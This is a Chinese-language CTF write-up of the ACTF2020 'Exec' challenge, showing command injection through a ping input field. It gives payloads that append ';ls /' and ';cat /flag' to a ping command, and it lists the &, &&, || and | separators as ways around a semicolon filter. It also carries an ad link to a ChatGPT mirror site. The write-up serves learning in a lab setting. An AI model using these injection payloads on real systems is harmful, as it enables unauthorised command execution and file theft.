[ACTF2020 新生赛]Exec 1-REC攻击 eval执行 分号绕过

小木 / 61 /

ChatGPT 可用网址,仅供交流学习使用,如对您有所帮助,请收藏并推荐给需要的朋友。
https://ckai.xyz

image.png
打开页面是一个输入框,输入IP地址用来ping,先输入正常的IP0.0.0.0
image.png
显示ping 0.0.0.0的结果
可能是在后台eval执行该命令并返回结果,尝试ping 0.0.0.0;ls让他显示当前文件夹的信息
image.png
发现注入点
获取根文件夹信息 payload=ping 0.0.0.0;ls /
image.png
发现flag
获取flag payload=ping 0.0.0.0;cat /flag
image.png
得到flag

过滤分号怎么办?
& && || |替换

command1 & command2 命令1,命令2同时执行
command1 && command2 命令1执行成功后命令2才会执行
command1 || command2 命令1执行失败后命令2才会执行
command1 | command2 命令2接收命令1的输出 并执行(命令2一定会执行)

[ACTF2020 新生赛]Exec 1-REC攻击 eval执行 分号绕过
作者
小木
许可协议
CC BY 4.0
发布于
2023-09-18
修改于
2024-04-11
Bonnie image
尚未登录